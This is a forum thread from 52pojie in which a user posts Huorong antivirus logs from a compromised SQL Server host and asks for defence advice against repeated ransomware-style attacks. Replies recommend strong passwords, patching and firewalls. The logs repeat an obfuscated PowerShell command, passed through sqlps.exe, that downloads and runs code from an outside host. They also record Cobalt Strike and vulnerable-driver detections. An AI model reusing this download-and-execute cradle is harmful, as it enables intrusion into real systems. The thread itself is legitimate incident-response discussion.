官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - 52pojie.cn»网站 【 软件安全 】 『悬赏问答区』 求防御建议
返回列表 发新帖
查看: 125|回复: 4
收起左侧

[经验求助] 求防御建议

[复制链接]
Jutean
Jutean 发表于 2025-12-29 12:34
200吾爱币
【1】2025-12-29 11:13:52,病毒防护,内存防护,发现病毒Backdoor/CobaltStrike.lj, 暂不处理

病毒名称:Backdoor/CobaltStrike.lj
病毒ID:FFCEFA196C4C9722
虚拟地址:0x000000001D460000
映像大小:8.0KB
是否完整映像:否
数据流哈希:454f7
操作结果:暂不处理
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps  .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
父进程命令行:"C:\Windows\system32\cmd.exe" /c sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 ,
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】2025-12-29 11:13:52,病毒防护,内存防护,发现病毒Backdoor/CobaltStrike.l, 暂不处理

病毒名称:Backdoor/CobaltStrike.l
病毒ID:7E662B652271E28F
虚拟地址:0x000000001D170000
映像大小:4.0KB
是否完整映像:否
数据流哈希:454f7
操作结果:暂不处理
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps  .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
父进程命令行:"C:\Windows\system32\cmd.exe" /c sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 ,
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【3】2025-12-29 11:12:39,病毒防护,文件实时监控,发现病毒Exploit/Vulndriver.o, 已处理

病毒名称:Exploit/Vulndriver.o
病毒ID:CC77A44FC3ED93CB
病毒路径:C:\Windows\System32\k2
操作类型:修改
操作结果:已处理,删除文件

进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps  .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2025-12-29 11:12:36,病毒防护,文件实时监控,发现病毒Exploit/Vulndriver.q, 已处理

病毒名称:Exploit/Vulndriver.q
病毒ID:9FF896CC655F8112
病毒路径:C:\Windows\System32\t2
操作类型:修改
操作结果:已处理,删除文件

进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps  .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【5】2025-12-29 11:12:33,病毒防护,文件实时监控,发现病毒Exploit/Vulndriver.m, 已处理

病毒名称:Exploit/Vulndriver.m
病毒ID:00AF2F14CBCE0F35
病毒路径:C:\Windows\System32\n2
操作类型:修改
操作结果:已处理,删除文件

进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps  .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【6】2025-12-29 09:49:19,其他,升级日志,自动更新成功,版本号:6.0.8.4

升级方式:自动更新
升级结果:成功,版本号:6.0.8.4,病毒库时间:2025-12-28 19:16
下载文件:
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\hwl.db
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db

更新文件:
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\hwl.db
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
        2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【7】2025-12-29 09:21:43,系统防护,软件安装拦截,OfficeClickToRun.exe尝试安装软件,已阻止

文件路径:C:\Program Files\Common Files\microsoft shared\ClickToRun\OnlineInteraction\46da4f2f-e90b-4b4d-804d-aff94a326663_11df\MSOfficePLUS.exe
安装软件:MSOfficePLUS
操作结果:已阻止

进程ID:7788
操作进程:C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【8】2025-12-29 08:49:21,其他,升级日志,自动更新成功,版本号:6.0.8.4

升级方式:自动更新
升级结果:成功,版本号:6.0.8.4,病毒库时间:2025-12-27 19:58
下载文件:
        2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\prop.db
        2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\pset.db
        2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\crithash.db
        2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
        2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\db\hips.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\behav.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\appprot.db

更新文件:
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\prop.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\pset.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\crithash.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\hips.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\behav.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db
        2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\appprot.db


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

这是火绒的日志,此数据库文件经常被攻击加密
有两个限制
1、内外网IP无法变
2、数据库端口号无法变

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

Hmily
Hmily 发表于 2025-12-29 15:14
别用弱口令啊。
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复

举报

greatpeng
greatpeng 发表于 2025-12-29 17:04
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
1、先确保系统没有弱口令。
2、终端打补丁、开启防护。
3、加防火墙,配策略。
如何升级?如何获得积分?积分对应解释说明!
回复

举报

Jutean
 楼主| Jutean 发表于 2025-12-29 19:52
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
Hmily 发表于 2025-12-29 15:14
别用弱口令啊。

底下客户端是明文配置
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复

举报

Jutean
 楼主| Jutean 发表于 2025-12-29 19:53
greatpeng 发表于 2025-12-29 17:04
1、先确保系统没有弱口令。
2、终端打补丁、开启防护。
3、加防火墙,配策略。

这三条路走过,架不住门牌钥匙摆在这,无奈。
如何快速判断一个文件是否为病毒!
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-1-2 20:37

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表